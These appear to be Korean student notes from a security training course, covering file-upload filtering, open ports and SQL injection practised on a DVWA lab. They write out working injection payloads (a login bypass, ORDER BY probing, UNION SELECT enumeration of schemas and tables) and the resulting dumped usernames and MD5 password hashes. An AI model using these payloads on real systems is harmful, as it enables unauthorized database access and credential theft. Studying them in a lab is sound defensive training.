28일차 : SQL 인젝션

step1
업로드 코드 핵심 부분 : enctype="multipart/form-data" 
> 확장자 차단
step2
mine 타입 차단
step3
이중확장자 차단

제일 많이 열려있는 포트는 80번임

SQL 인젝션 : 데이터베이스 중간에 끼워넣는 것

select from
select * from users;
selcet idx,id_param from users;
selcet id_param from users where id_param='admin'
selcet id_param from users where id_param='1' or '1'='1'
admin > '1' or '1'='1'

insert into
update set
delete from
> 이 4개를 가지고 쿼리 문 작성함


1' or '1'='1 로그인 시도
사진01

dvwa.st.kr에 SQL Injection에 아래의 코드 넣어보기
1' UNION SELECT name,pw from users#
1' ORDER BY 1#
1' ORDER BY 2#
1' ORDER BY 3#(X) > 열리지 않음

1' UNION SELECT 1,2#
1' UNION SELECT 1,2,3#(X) > 열리지 않음

' UNION SELECT schema_name,2 from information_schema.schemata#
' UNION SELECT table_name,2 from information_schema.tables where table_schema='web2'#
' UNION SELECT column_name,2 from information_schema.columns where table_schema='web2' and table_name='users'#

' UNION SELECT user,password from users#
First name: admin
Surname: e10adc3949ba59abbe56e057f20f883e

First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03

First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b

First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7

First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99

>> 완벽한 보안은 존재하지 않음

1' UNION SELECT name,pw from users#

md5 자동화 프로그램 만들기

SQL 자동화 프로그램 만들기 > 웹의 구조를 이해

웹공격 SQL
request
response

업로드 공격 ??

사이트에서 포트
21,22,23,25,110,143,3306 > 열어놓으면 보안이 약해짐
다만,
80,443 > 모든 사이트는 이건 항상 열려있음

사이트 중 로그인페이지는 외부 공격을 자주 받는 부분임 > 신경을 잘 써야 함


	

2025 산대특